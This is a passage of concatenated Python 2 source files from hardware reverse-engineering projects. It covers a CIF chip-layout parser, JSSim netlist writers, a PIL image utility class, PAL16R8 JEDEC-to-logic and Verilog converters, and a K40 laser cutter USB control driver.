subroutine.scale_numerator = int(parts[2])
subroutine.scale_denominator = int(parts[3])
self.cur_subroutine = subroutine
print_orig = False
elif key == "B":
print_orig = False
if BOX_MAX:
if box_limit == BOX_MAX:
print 'Last accepted box: ' + repr(statement)
if box_limit > BOX_MAX:
return False
box_limit += 1
'''
Syntax:
B <length> <width> <xpos> <ypos> [rotation] ;
'''
if self.active_layer is None:
raise Exception('Must be in layer to use box')
'''
B length width xpos ypos [rotation] ;
a box the center of which is at (xpos, ypos) and is length across in x and width tall in y.
However, I don't like dealing with that so I'm translating
'''
width_orig = int(parts[1])
height_orig = int(parts[2])
xpos_orig = int(parts[3])
ypos_orig = int(parts[4])
width = width_orig * self.scalar
height = height_orig * self.scalar
xpos = xpos_orig * self.scalar
ypos = ypos_orig * self.scalar
# Lambda design rules FTW
if not scalar is None:
xpos *= scalar
ypos *= scalar
width *= scalar
height *= scalar
xpos_corner = xpos - width / 2.0
ypos_corner = ypos - height / 2.0
perform_action = True
if g_limit_polygon:
feature_poly = UVPolygon.from_rect_ex(xpos_corner, ypos_corner, width, height)
if not g_limit_polygon.intersects(feature_poly):
perform_action = False
if perform_action:
# Should truncate to int? Don't do it unless it becomes a problem
rotation = None
if len(parts) >= 6:
rotation = int(parts[5])
if self.corner_coordinates:
self.add_box(width, height, xpos_corner, ypos_corner, rotation)
else:
self.add_box(width, height, xpos, ypos, rotation)
if g_print_result:
rotation_str = ''
if not rotation is None:
rotation_str = ' %d' % rotation
width_i = int(width)
height_i = int(height)
# Skip invalid geometries
if not width_i == 0 and not height_i == 0:
print 'B %d %d %d %d%s;' % (width_i, height_i, int(xpos + width / 2.0), int(ypos + height / 2.0), rotation_str)
elif key == "9":
'''
Cell name
Syntax:
9 <text>
Ignore, unused for now
'''
self.cell_name = statement[2:]
elif key == "94":
'''
Label
Syntax:
94 <label token> <x> <y> [layer]
'''
text = parts[1]
x = int(int(parts[2]) * self.scalar)
y = int(int(parts[3]) * self.scalar)
# Lambda design rules FTW
if not scalar is None:
x *= scalar
y *= scalar
layer_id = None
if len(parts) >= 5:
layer_str = parts[4]
layer_id = layer_id = Layer.str2id(layer_str)
self.add_label(text, x, y, layer_id)
if g_print_result:
print_orig = False
layer_str = ''
if not layer_id is None:
printed_layer_str = ' %s' % layer_str
print '94 %s %d %d%s;' % (text, x, y, printed_layer_str)
else:
raise Exception("Couldn't parse statement %s" % statement)
if print_orig:
print statement + ';'
return ret
def run(self):
'''
http://en.wikipedia.org/wiki/Caltech_Intermediate_Form
0 x y layer N name; Set named node on specified layer and position
0V x1 y1 x2 y2 ... xn yn; Draw vectors
2A "msg" T x y; Place message above specified location
2B "msg" T x y; Place message below specified location
2C "msg" T x y; Place message centered at specified location
2L "msg" T x y; Place message left of specified location
2R "msg" T x y; Place message right of specified location
4A lowx lowy highx highy; Declare cell boundary
4B instancename; Attach instance name to cell
4N signalname x y; Labels a signal at a location
9 cellname; Declare cell name
91 instancename; Attach instance name to cell
94 label x y; Place label in specified location
Need to support this to assign nets
95 label length width x y; Place label in specified area
FIGURE B.5 Typical user extensions to CIF.
'''
self.f = open(self.file_name, 'r')
while True:
l = self.next_statement()
if l is None:
break
if self.parse_statement(l):
break
import sys
#print 'Debug break'
#sys.exit(1)
```
#### File: jssim/files/nodenames.py
```python
from pr0ntools.jssim.options import Options
from util import get_js_file_header
class NodeName:
def __init__(self, name=None, net=None):
# string
self.name = name
# int
self.net = net
def run_DRC(self):
pass
def __repr__(self):
# clk0: 4,
return '%s: %u' % (self.name, self.net)
class NodeNames:
def __init__(self):
self.nodenames = list()
def run_DRC(self):
names = set(['gnd', 'vcc', 'clk0', 'reset'])
found = set()
for nodename in self.nodenames:
name = nodename.name
print 'Node %s => %u' % (name, nodename.net)
if name in names:
found.add(name)
if not 'gnd' in found:
raise Exception('Missing gnd node name')
if not 'vcc' in found:
raise Exception('Missing vcc node name')
# Not strictly necessary but in all the designs I've done so far
if not 'clk0' in found:
raise Exception('Missing clk0 node name')
if not 'reset' in found:
print 'WARNING: missing reset node name'
#raise Exception('Missing reset node name')
pass
def add(self, nodename):
self.nodenames.append(nodename)
def __repr__(self):
'''Return nodenames.js content'''
'''
var nodenames ={
gnd: 2,
vcc: 1,
out1: 3,
in1: 4,
clk0: 4,
}
'''
ret = get_js_file_header(Options.JS_FILE_NODENAMES, Options.NODENAMES_VER)
ret += 'var nodenames_ver = "%s";\n' % Options.NODENAMES_VER
ret += 'var nodenames = {\n'
for nodename in self.nodenames:
# Having , at end is acceptable
ret += repr(nodename) + ',\n'
ret += '}\n'
return ret
def write(self):
f = open(Options.JS_FILE_NODENAMES, 'w')
f.write(self.__repr__())
f.close()
```
#### File: jssim/files/transdefs.py
```python
from pr0ntools.jssim.options import Options
from util import get_js_file_header
class Transdef:
'''
WARNING: needs coordinates in lower left, standard is upper left
(Ijor's?) comment from 6800's transdefs:
/*
* The format here is
* name
* gate,c1,c2
* bb (bounding box: xmin, xmax, ymin, ymax)
* geometry (unused) (width1, width2, length, #segments, area)
* weak (boolean) (marks weak transistors, whether pullups or pass gates)
*
* Note: the geometry is of the MOSFET channel: the two widths are
* the lengths of the two edges where the poly is crossing the active
* area. These will be equal if the channel is straight or makes an
* equal number of right and left turns. The number of segments should
* be 1 for a rectangular channel, or 2 for an L shape, 3 for a Z
* or U, and will allow for taking into account corner effects.
*
* At time of writing JSSim doesn't use transistor strength information
* except to discard weak transistors and to treat pullups as
* described in segdefs.js specially.
*
*/
'''
def __init__(self, name=None, gate=None, c1=None, c2=None, bb=None, geometry=None, weak=None):
# string
self.name = name
# int
self.gate = gate
# int
self.c1 = c1
# int
self.c2 = c2
# 4 element list
self.bb = bb
# list / structure
self.geometry = geometry
# boolean
self.weak = weak
self.run_DRC()
def run_DRC(self):
pass
def __repr__(self):
#['t1',4,2,3,[176,193,96,144],[415,415,11,5,4566],false],
ret = '['
ret += "'%s',%u,%u,%u" % (self.name, self.gate, self.c1, self.c2)
ret += ",[%u,%u,%u,%u]" % (self.bb[0], self.bb[1], self.bb[2], self.bb[3])
ret += ",[%u,%u,%u,%u,%u]" % (self.geometry[0], self.geometry[1], self.geometry[2], self.geometry[3], self.geometry[4])
if self.weak:
ret += ",true"
else:
ret += ",false"
ret += ']'
return ret
class Transdefs:
def __init__(self):
self.transdefs = list()
def __repr__(self):
ret = get_js_file_header(Options.JS_FILE_TRANSDEFS, Options.TRANSDEFS_VER)
ret += 'var segdefs_ver = "%s";\n' % Options.SEGDEFS_VER
ret += 'var transdefs = [\n'
for transdef in self.transdefs:
# Having , at end is acceptable
ret += repr(transdef) + ',\n'
ret += ']\n'
return ret
def add(self, transdef):
self.transdefs.append(transdef)
def write(self):
f = open(Options.JS_FILE_TRANSDEFS, 'w')
f.write(self.__repr__())
f.close()
```
#### File: pr0ntools/jssim/transistor.py
```python
class TechnologyW:
def __init__(self, has_nmos, has_pmos, has_bipolar):
self.nmos = has_nmos
self.pmos = has_pmos
self.bipolar = has_bipolar
def has_nmos(self):
return self.nmos
def has_pmos(self):
return self.pmos
def has_bipolar(self):
return self.bipolar
class Technology:
'''
By no means a comprehensive list, just a start of what *might* be needed in near future
'''
# Just kidding
# ROCK = TechnologyW(False, False, False)
INVALID = None
# Uses bipolar transistors (ex: TTL)
BIPOLAR = TechnologyW(False, False, True)
# N-channel MOS
NMOS = TechnologyW(True, False, False)
# P-channel MOS
PMOS = TechnologyW(False, True, False)
# N-channel and P-channel MOS on the same chip
CMOS = TechnologyW(True, True, False)
# BiCMOS: mix of bipolar and CMOS
BICMOS = TechnologyW(True, True, True)
@staticmethod
def from_string(s):
s = s.upper()
if s == "BIPOLAR":
return Technology.BIPOLAR
elif s == "NMOS":
return Technology.NMOS
elif s == "PMOS":
return Technology.PMOS
elif s == "CMOS":
return Technology.CMOS
elif s == "BICMOS":
return Technology.BICMOS
else:
return Technology.INVALID
'''
Not really needed for anything yet
class LogicFamily:
INVALID = 0
'''
class Transistor:
'''
JSSim likes c1 more "interesting" than c2
Try to make c1 be the variable connection and c2 constant if applicable
'''
def __init__(self, g=None, c1=None, c2=None):
# These should be Net objects, not numbers
# gate
self.g = g
# connection1
self.c1 = c1
# connection2
self.c2 = c2
# Rectangle (two Point's)
self.rect_p1 = None
self.rect_p2 = None
self.weak = None
def set_bb(self, point1, point2):
self.rect_p1 = point1
self.rect_p2 = point2
def __repr__(self):
return 'c1: %u, g: %u, c2: %u, weak: %s' % (self.c1.number, self.g.number, self.c2.number, repr(self.weak))
class Transistors:
def __init__(self):
# no particular order
self.transistors = set()
def add(self, transistor):
self.transistors.add(transistor)
```
#### File: pr0ntools/pr0ntools/pimage.py
```python
from PIL import Image
import os
# needed for PNG support
# rarely used and PIL seems to have bugs
PALETTES = bool(os.getenv('PR0N_PALETTES', ''))
class PImage:
# We do not copy array, so be careful with modifications
def __init__(self, image):
# A PIL Image object
self.image = None
self.temp_file = None
if image is None:
raise Exception('cannot construct on empty image')
self.image = image
def debug_print(self, char_limit = None, row_label = False):
for y in range(0, self.height()):
row_label_str = ''
if row_label:
row_label_str = '%02d: ' % y
print row_label_str + self.debug_row_string(y, char_limit, row_label_str)
def debug_row_string(self, y, char_limit = None, row_label = None):
if row_label is None:
row_label = ''
ret = row_label
x_max = self.width()
for x in range(0, x_max):
if not x == 0:
ret += " "
ret += "% 4s" % repr(self.get_pixel(x, y))
if char_limit and len(ret) > char_limit:
ret = ret[0:char_limit]
break
return ret
# To an Image
def to_image(self):
return self.image
'''
First step in scaling is to take off any whitespace
This normalizes the spectra
Returns a new image that is trimmed
'''
def trim(self):
(image, _x_min, _x_max, _y_min, _y_max) = self.trim_verbose()
return image
def trim_verbose(self):
#print 'Trimming: start'
# Set to lowest set pixel
# Initially set to invalid values, we should replace them
# I'm sure there are more effient algorithms, but this "just works" until we need to up performance
# What we probably should do is scan in from all sides until we hit a value and then stop
x_min = self.width()
x_max = -1
y_min = self.height()
y_max = -1
for y in range(0, self.height()):
for x in range(0, self.width()):
# print "%s != %s" % (self.get_pixel(x, y), self.white())
# if set, we have a value influencing the result
if self.get_pixel(x, y) != self.white():
x_min = min(x_min, x)
y_min = min(y_min, y)
x_max = max(x_max, x)
y_max = max(y_max, y)
#print (x_min, x_max, y_min, y_max)
#print 'Trimming: doing subimage'
return (self.subimage(x_min, x_max, y_min, y_max), x_min, x_max, y_min, y_max)
def save(self, *args, **kwargs):
'''save(file name[, format, kw options]) where kw_options includes quality=<val>'''
self.image.save(*args, **kwargs)
def get_scaled(self, factor, filt = None):
if filt is None:
filt = Image.NEAREST
i = self.image.resize((int(self.width() * factor), int(self.height() * factor)), filt)
return PImage.from_image(i)
'''
Given exclusive end array bounds (allows .width() convenience)
returns a new image trimmed to the given bounds
Truncates the image if our array bounds are out of range
Maybe we should throw exception instead?
'''
def subimage(self, x_min, x_max, y_min, y_max):
if x_min is None:
x_min = 0
if x_max is None:
x_max = self.width()
if y_min is None:
y_min = 0
if y_max is None:
y_max = self.height()
#print 'subimage: start. x_min: %d: x_max: %d, y_min: %d, y_max: %d' % (x_min, x_max, y_min, y_max)
if x_min < 0 or y_min < 0 or x_max < 0 or y_max < 0:
print x_min, y_min, x_max, y_max
raise Exception('out of bounds')
# Did we truncate the whole image?
if x_min > x_max or y_min > y_max:
return self.from_array([], self.get_mode(), self.get_mode())
'''
height = y_max - y_min + 1
width = x_max - x_min + 1
array_out = [[0 for i in range(width)] for j in range(height)]
for cur_height in range(0, height):
for cur_width in range(0, width):
array_out[cur_height][cur_width] = self.get_pixel(cur_height + y_min, cur_width + x_min)
#print 'subimage: beginning from array'
return self.from_array(array_out, self.get_mode(), self.get_mode())
'''
# 4-tuple (x0, y0, x1, y1)
#print 'x_min: %d, y_min: %d, x_max: %d, y_max: %d' % (x_min, y_min, x_max, y_max)
# This is exclusive, I want inclusive
return PImage.from_image(self.image.crop((x_min, y_min, x_max, y_max)))
def copy(self):
return self.subimage(None, None, None, None)
def rotate(self, degrees):
return PImage.from_image(self.image.rotate(degrees))
def width(self):
return self.image.size[0]
def height(self):
return self.image.size[1]
def set_pixel(self, x, y, pixel):
self.image.putpixel((x, y), pixel)
def get_pixel(self, x, y):
try:
return self.image.getpixel((x, y))
except:
print 'bad pixel values, x: %d, y: %d' % (x, y)
raise
# The following are in case we change image mode
def black(self):
'''return the instance's representation of black'''
mode = self.get_mode()
if mode == "1":
return 1
if mode == "L":
return 0
if mode == "RGB":
return (255, 255, 255)
raise Exception('Bad mode %s' % mode)
def white(self):
'''return the instance's representation of white'''
mode = self.get_mode()
if mode == "1":
return 0
if mode == "L":
return 255
if mode == "RGB":
return (0, 0, 0)
raise Exception('Bad mode %s' % mode)
def pixel_to_brightness(self, pixel):
'''Convert pixel to brightness value, [0.0, 1.0] where 0 is white and 1 is black'''
# The above range was chosen somewhat arbitrarily as thats what old code did (think because thats what "1" mode does)
# Also, it makes it convenient for summing up "filled" areas as we usually assume (infinite) white background
mode = self.get_mode()
if mode == "1":
# TODO: double check this is correct, that is 0 is white and 1 is black
return pixel * 1.0
if mode == "L":
# 255 is white
return 1.0 - (1 + pixel) / 256.0
if mode == "RGB":
# RGB represents (255, 255, 255) as white since all colors are at max
# Also scale to the range correctly by adding 3 and then invert to make it luminescence
return 1.0 - (pixel[0] + pixel[1] + pixel[2] + 3) / (256.0 * 3)
raise Exception('Bad mode %s' % mode)
def get_mode(self):
return self.image.mode
def file_name(self):
return self.image.fp.name
def set_canvas_size(self, width, height):
# Simple case: nothing to do
if self.width() == width and self.height == height:
return
ip = Image.new(self.image.mode, (width, height))
if PALETTES and self.image.palette:
ip.putpalette(self.image.palette)
ip.paste(self.image, (0,0))
# Shift the old image out
self.image = ip
def paste(self, img, x, y):
#self.image.paste(img, (x, y))
# left, upper, right, and lower
self.image.paste(img.image, (x, y, x + img.width(), y + img.height()))
@staticmethod
def from_file(path):
'''
I'm having difficulty dealing with anything paletted, so convert everything right off the bat
'''
if not type(path) in (str, unicode):
raise Exception("Bad path %s" % path)
img = Image.open(path)
if img is None:
raise Exception("Couldn't open image file: %s" % path)
if False:
img_converted = img.convert('L')
return PImage.from_image(img_converted)
else:
return PImage.from_image(img)
@staticmethod
def from_image(image):
return PImage(image)
@staticmethod
def from_blank(width, height, mode="RGB"):
'''Create a blank canvas'''
return PImage.from_image(Image.new(mode, (width, height)))
@staticmethod
def from_fns(*args, **kwargs):
return PImage.from_image(from_fns(*args, **kwargs))
@staticmethod
def from_unknown(image, trim=False):
if isinstance(image, str):
ret = PImage.from_file(image)
elif isinstance(image, PImage):
ret = image
elif isinstance(image, image.Image):
ret = PImage.from_image(image)
else:
raise Exception("unknown parameter: %s" % repr(image))
if trim:
ret = ret.trim()
return ret
@staticmethod
def get_pixel_mode(pixel):
'''Tries to guess pixel mode. Hack to transition some old code, don't use this'''
# FIXME: make sure array mode matches our created image
if type(pixel) == type(0):
return "L"
if len(pixel) == 3:
return 'RGB'
else:
return "L"
@staticmethod
def from_array(array, mode_in = None, mode_out = None):
'''
array[y][x]
'''
#print 'from_array: start'
# Make a best guess, we should probably force it though
if mode_in is None:
mode_in = PImage.get_pixel_mode(array[0][0])
if mode_out is None:
mode_out = mode_in
ret = None
height = len(array)
if height > 0:
width = len(array[0])
if width > 0:
# (Xsize, Ysize)
# Feed in an arbitrary pixel and assume they are all encoded the same
# print 'width: %d, height: %d' % (width, height)
ret = PImage(Image.new(mode_out, (width, height), "White"))
for y in range(0, height):
for x in range(0, width):
# print 'x: %d, y: %d' % (x, y)
ret.set_pixel(x, y, array[y][x])
if ret is None:
ret = PImage(Image.new(mode_out, (0, 0), "White"))
#print 'from_array: end'
return ret
@staticmethod
def is_image_filename(filename):
return filename.find('.tif') > 0 or filename.find('.jpg') > 0 or filename.find('.png') > 0 or filename.find('.bmp') > 0
def from_fns(images_in, tw=None, th=None):
'''
Return an image constructed from a 2-D array of image file names
[[r0c0, r0c1],
[r1c0, r1c1]]
'''
mode = None
rows = len(images_in)
cols = len(images_in[0])
im = None
src_last = None
# Ensure all images loaded
for rowi in range(rows):
row = images_in[rowi]
if len(row) != cols:
raise Exception('row size mismatch')
for coli in range(cols):
# Ensure its a PImge object
src = images_in[rowi][coli]
if src is None:
# Can we make a best guess on what to fill in?
if not src_last:
continue
# im should in theory work but accessing pixels
# is for some reason causing corruption
iml = Image.open(src_last)
imf = Image.new(mode, (tw, th))
if PALETTES:
imf.putpalette(iml.palette)
pix = iml.getpixel((tw - 1, th - 1))
imf.paste(pix, (0, 0, tw, th))
images_in[rowi][coli] = imf
else:
im = Image.open(src)
imw, imh = im.size
if mode is None:
mode = im.mode
elif im.mode != mode:
raise Exception('mode mismatch')
if tw is None:
tw = imw
elif tw != imw:
raise Exception('tile width mismatch: %s has %s vs %s' % (src, tw, imw))
if th is None:
th = imh
elif th != imh:
raise Exception('tile height mismatch')
images_in[rowi][coli] = im
src_last = src or src_last
# Images are now all either PImage or None with uniform width/height
width = tw * cols
height = th * rows
ret = Image.new(mode, (width, height))
# Copy palette over from last png, if possible
if PALETTES and im and im.palette:
ret.putpalette(im.palette)
#ret = im.copy()
#ret.resize((width, height))
for rowi in range(rows):
for coli in range(cols):
src = images_in[rowi][coli]
# Allowed to be empty
if src:
# (left, upper)
cpix = coli * tw
rpix = rowi * th
ret.paste(src, (cpix, rpix))
#ret = im_reload(ret)
return ret
# Change canvas, shifting pixels to fill it
def rescale(im, factor, filt=Image.NEAREST):
w, h = im.size
ret = im.resize((int(w * factor), int(h * factor)), filt)
# for some reason this breaks the image
# but for other similiar operations its required
if 0 and im.palette:
ret.putpalette(im.palette)
return ret
# Change canvas, not filling in new pixels
def resize(im, width, height, def_color=None):
if PALETTES and im.palette:
# Lower right corner is a decent default
# since will probably have a (black) border
xy = tuple([x - 1 for x in im.size])
def_color = im.getpixel(xy)
ret = Image.new(im.mode, (width, height), def_color)
# WARNING: workaround for PIL bugs
# don't use putpalette(im.palette)
# it mixes up RGB and RGB;L
ret.putpalette(im.palette.tobytes())
else:
ret = Image.new(im.mode, (width, height))
ret.paste(im, (0, 0))
return ret
def im_reload(im):
im.save('/tmp/pt_pil_tmp.png')
return Image.open('/tmp/pt_pil_tmp.png')
``` |
{
"source": "JohnDMcMaster/superpal",
"score": 2
} |
#### File: JohnDMcMaster/superpal/pal16r8_jed_to_wincupl.py
```python
def main():
import argparse
parser = argparse.ArgumentParser(description='')
parser.add_argument('jed_in')
args = parser.parse_args()
f = open(args.jed_in, 'r')
data = f.readlines()
f.close()
# crappy jedec parser
allbits = []
for l in data:
l = l.strip()
if l[0] == 'L':
_addr = int(l[1:6])
bits = l[7:-1]
allbits.append(bits)
allbits = ''.join(allbits)
# TODO: move these into a config/net name file
inputnames = [
'CYC0', 'CYC1', 'CYC2', 'CYC3', 'INT_S0#', 'INT_S1#', 'INT_S2#',
'HIGH_BYTE'
]
#outputnames = []
#for i in range(8):
# outputnames.append('O%d' % (i+1))
# TODO: move these into a config/net name file
outputnames = ['O1', 'O2', 'UNK5', 'O4', 'U58_LE', 'UNK2', 'UNK3', 'O8']
# generate the english names for each input to the matrix
termnames = []
for i in range(8):
#termnames.append('I%d' % (i+2))
#termnames.append('!I%d' % (i+2))
termnames.append('%s' % (inputnames[i]))
termnames.append('!%s' % (inputnames[i]))
#termnames.append('O%d' % (i+1))
#termnames.append('!O%d' % (i+1))
termnames.append('%s' % (outputnames[i]))
termnames.append('!%s' % (outputnames[i]))
# TODO: fix magic numbers
# each output has 8 sum terms. (for the R. the L has an OE and 7 terms)
for outp in range(8):
list_sums = []
terms = allbits[(256 * outp):(256 * (outp + 1))]
for st in range(8):
list_prods = []
proterm = terms[(32 * st):(32 * (st + 1))]
# process product term
# if it is 1111..., then it is fixed at a logic high
# this means the corresponding output is always high.
if not ('0' in proterm):
list_prods = [1]
list_sums.append('1')
# if it is 0000...., then it is fixed at a logic low
# this means we get to skip this sum term
elif not ('1' in proterm):
pass
else:
for pt in range(32):
if proterm[pt] == '0':
list_prods.append(termnames[pt])
list_sums.append('(' + ' & '.join(list_prods) + ')')
#print(list_sums)
print(outputnames[outp] + ' = ' + ' | '.join(list_sums))
print('\n')
```
#### File: JohnDMcMaster/superpal/pal16xx_jed_to_verilog.py
```python
from superpal.verilog.jed_to_verilog import run
def main():
import argparse
parser = argparse.ArgumentParser(description='')
parser.add_argument('--metadata', help="Supplemental parsing data ")
parser.add_argument('jed_in')
parser.add_argument('v_out')
args = parser.parse_args()
run(args.jed_in, args.v_out, metadata_fn=args.metadata)
if __name__ == "__main__":
main()
```
#### File: superpal/verilog/pal16r8.py
```python
from collections import OrderedDict
import re
import json
import subprocess
from . import vutil
class PAL16R8(vutil.PAL):
def __init__(self, *args, **kwargs):
self.PIN_CLK = 1
self.PIN_OEn = 11
vutil.PAL.__init__(self, *args, **kwargs)
def part(self):
return "PAL16R8"
def is_io_pinn(self, pinn):
return pinn not in (self.PIN_GND, self.PIN_VCC, self.PIN_CLK,
self.PIN_OEn)
def create_sim_mask(self):
"""
Register setup is not reliable
So only keep things that depend on inputs, not regs
"""
# By package pin number
self.looped = {}
for (lhs_net, equation) in self.view.equations.items():
_lhs_isinv, (lhs_bus, lhs_pinn), _oper, rhs_terms = equation
self.looped[lhs_pinn] = False
for (lhs_net, equation) in self.view.equations.items():
_lhs_isinv, (lhs_bus, lhs_pinn), _oper, rhs_terms = equation
for termi, term in enumerate(rhs_terms):
# Skip operators
if termi % 2 == 1:
continue
rhs_net, _lhs_isinv, _rhs_buspinn = term
if "i" not in rhs_net:
self.looped[lhs_pinn] = True
break
def verilog_write_pal(self, f, terms):
def line(l):
f.write(l + "\n")
line('module dut(')
line(' input wire clk,')
line(' input wire oen,')
line(' input wire [%u:0] i,' % (self.get_npins_in() - 1, ))
line(' output wire [%u:0] o' % (self.get_npins_out() - 1, ))
line(' );')
def rname(pinn):
return self.pin_n2verilog(pinn).replace("o", "oreg").replace(
'[', '').replace(']', '')
# Register definitions
for pinn, func in self.PINS_DUT.items():
if func == "o":
line(" reg %s = 1'b1;" % (rname(pinn), ))
line("")
# Assign output wires to internal regs
for pinn, func in self.PINS_DUT.items():
if func == "o":
line(" assign %s = oen ? 1'bz : %s;" %
(self.pin_n2verilog(pinn), rname(pinn)))
line("")
# Main logic
line(' always @(posedge clk) begin')
for pinn, func in self.PINS_DUT.items():
if func == "o":
line(' %s <= %s;' %
(rname(pinn), terms[self.pin_n2verilog(pinn)]))
line(' end')
line('endmodule')
def verilog_write_top(self, f):
def line(l):
f.write(l + "\n")
# CLK, OEn
nepromi = self.get_npins_in() + 2
"""
1024 entries
100 ns per entry
"""
# sim_time = 102500
sim_step = 100
# clk step + addr step
sim_time = ((1 << nepromi) + 1) * sim_step
line("module sim_top();")
line("""
initial begin
$dumpfile("dut.vcd");
$dumpvars(0, sim_top);
end
initial begin
# %u $finish;
end
""" % sim_time)
# readpal: EPROM LSB is CLK
line(" reg [%u:0] epromi = %u'b0;" % (nepromi - 1, nepromi))
line(" wire clk = epromi[0];")
line(" wire oen = epromi[9];")
# Skip CLK, OEn
line(" wire [%u:0] pali = {epromi[8:1]};" %
(self.get_npins_in() - 1, ))
line(" wire [%u:0] palo;" % (self.get_npins_out() - 1, ))
line("""
always #%u begin
epromi = epromi + %u'b1;
end
""" % (sim_step, nepromi))
'''
line("""
always #%u begin
clk = ~clk;
end""" % (sim_step, ))
'''
line("""
dut dut(
.clk(clk),
.oen(oen),
.i(pali),
.o(palo));
""")
ifmt = "%b" * nepromi
ofmt = "%b" * self.get_npins_out()
iargs = ", ".join("epromi[%u]" % (nepromi - i - 1)
for i in range(nepromi))
oargs = ", ".join("palo[%u]" % (self.get_npins_out() - i - 1)
for i in range(self.get_npins_out()))
line("""
initial
$monitor("t=%t, i=""" + ifmt + """, o=""" + ofmt + """",
$time,
""" + iargs + """,
""" + oargs + """);
endmodule
""")
def verilog_write(self, terms, fn_out):
f = open(fn_out, "w")
def line(l):
f.write(l + "\n")
line('`default_nettype none')
line('')
self.verilog_write_pal(f, terms)
line('')
self.verilog_write_top(f)
``` |
{
"source": "JohnDMcMaster/uvscada",
"score": 2
} |
#### File: uvscada/k40/k40.py
```python
import usb.core
import usb.util
from egv import egv
import time
import traceback
##############################################################################
#### Status query responses ####
S_OK = 206
# Buffer full
S_BUFF_FULL = 238
# CRC error
S_CRC_ERR = 207
S_UNK1 = 236
# after failed initialization followed by succesful initialization
S_UNK2 = 239
#######################
PKT_STATUS = [160]
PKT_UNLOCK = [166,0,73,83,50,80,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,166,15]
PKT_HOME = [166,0,73,80,80,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,166,228]
PKT_ESTOP = [166,0,73,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,166,130]
class K40_CLASS:
def __init__(self):
self.dev = None
self.n_timeouts = 1
self.timeout = 200 # Time in milliseconds
self.write_addr = 0x2 # Write address
self.read_addr = 0x82 # Read address
self.read_length= 168
def get_status(self):
# "get_hello"
#255, 206, 111, 8, 19, 0
cnt=0
while cnt<self.n_timeouts:
try:
self.send_packet(PKT_STATUS)
break
except:
raise
pass
cnt=cnt+1
if cnt == self.n_timeouts:
msg = "Too Many Transmission Errors (%d Status Timeouts)" %(cnt)
raise StandardError(msg)
response = None
read_cnt = 0
while response is None and read_cnt < 10:
try:
response = self.dev.read(self.read_addr,self.read_length,self.timeout)
# Timeout
except usb.core.USBError:
response = None
read_cnt = read_cnt + 1
DEBUG = False
if response != None:
if DEBUG:
if int(response[0]) != 255:
print "0: ", response[0]
elif int(response[1]) != 206:
print "1: ", response[1]
elif int(response[2]) != 111:
print "2: ", response[2]
elif int(response[3]) != 8:
print "3: ", response[3]
elif int(response[4]) != 19: #Get a 3 if you try to initialize when already initialized
print "4: ", response[4]
elif int(response[5]) != 0:
print "5: ", response[5]
else:
print ".",
if response[1]==S_OK or \
response[1]==S_BUFF_FULL or \
response[1]==S_CRC_ERR or \
response[1]==S_UNK1 or \
response[1]==S_UNK2:
return response[1]
else:
return None
else:
return None
def unlock_rail(self):
self.send_packet(PKT_UNLOCK)
def e_stop(self):
self.send_packet(PKT_ESTOP)
def home_position(self):
self.send_packet(PKT_HOME)
def reset_usb(self):
self.dev.reset()
def release_usb(self):
if self.dev:
usb.util.dispose_resources(self.dev)
self.dev = None
#######################################################################
# The one wire CRC algorithm is derived from the OneWire.cpp Library
# The latest version of this library may be found at:
# http://www.pjrc.com/teensy/td_libs_OneWire.html
#######################################################################
def OneWireCRC(self,line):
crc=0
for i in range(len(line)):
inbyte=line[i]
for j in range(8):
mix = (crc ^ inbyte) & 0x01
crc >>= 1
if (mix):
crc ^= 0x8C
inbyte >>= 1
return crc
#######################################################################
def none_function(self,dummy=None):
#Don't delete this function (used in send_data)
pass
print 'GUI: ', dummy
def send_data(self,data,update_gui=None,stop_calc=None,passes=1,preprocess_crc=True):
print 'send data begin'
if stop_calc == None:
stop_calc=[]
stop_calc.append(0)
if update_gui == None:
update_gui = self.none_function
blank = [166,0,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,166,0]
packets = []
packet = blank[:]
cnt=2
len_data = len(data)
for j in range(passes):
if j == 0:
istart = 0
else:
istart = 1
data[-4]
if passes > 1:
if j == passes-1:
data[-4]=ord("F")
else:
data[-4]=ord("@")
for i in range(istart,len_data):
if cnt > 31:
packet[-1] = self.OneWireCRC(packet[1:len(packet)-2])
if not preprocess_crc:
self.send_packet_w_error_checking(packet,update_gui,stop_calc)
update_gui("Sending Data to Laser = %.1f%%" %(100.0*float(i)/float(len_data)))
else:
packets.append(packet)
update_gui("Calculating CRC data and Generate Packets: %.1f%%" %(100.0*float(i)/float(len_data)))
packet = blank[:]
cnt = 2
if stop_calc[0]==True:
raise StandardError("Action Stopped by User.")
packet[cnt]=data[i]
cnt=cnt+1
packet[-1]=self.OneWireCRC(packet[1:len(packet)-2])
if not preprocess_crc:
self.send_packet_w_error_checking(packet,update_gui,stop_calc)
else:
packets.append(packet)
packet_cnt = 0
print 'send data sending'
for line in packets:
update_gui()
self.send_packet_w_error_checking(line,update_gui,stop_calc)
packet_cnt = packet_cnt+1.0
update_gui( "Sending Data to Laser = %.1f%%" %( 100.0*packet_cnt/len(packets) ) )
##############################################################
print 'send data done'
def send_packet_w_error_checking(self,line,update_gui=None,stop_calc=None):
print 'send w/ error start'
timeout_cnt = 0
crc_cnt = 0
while timeout_cnt < self.n_timeouts and crc_cnt < self.n_timeouts:
try:
self.send_packet(line)
except:
raise
msg = "USB Timeout #%d" %(timeout_cnt)
print 'USB timeout'
update_gui(msg)
timeout_cnt=timeout_cnt+1
continue
######################################
response = self.get_status()
print 'response', response
if response == S_BUFF_FULL:
print 'buffer full'
while response == S_BUFF_FULL:
response = self.get_status()
break #break and move on to next packet
elif response == S_CRC_ERR:
msg = "Data transmission (CRC) error #%d" %(crc_cnt)
update_gui(msg)
crc_cnt=crc_cnt+1
continue
elif response == None:
msg = "Controller board is not responding."
update_gui(msg)
break #break and move on to next packet
else: #response == S_OK:
break #break and move on to next packet
#elif response == S_UNK1:
# msg = "Something UNKNOWN_1 happened: response=%s" %(response)
# break #break and move on to next packet
#elif response == S_UNK2:
# msg = "Something UNKNOWN_2 happened: response=%s" %(response)
# break #break and move on to next packet
#else:
# msg = "Something Undefined happened: response=%s" %(response)
# break #break and move on to next packet
if crc_cnt >= self.n_timeouts:
msg = "Too Many Transmission Errors (%d CRC Errors)" %(crc_cnt)
update_gui(msg)
raise StandardError(msg)
if timeout_cnt >= self.n_timeouts:
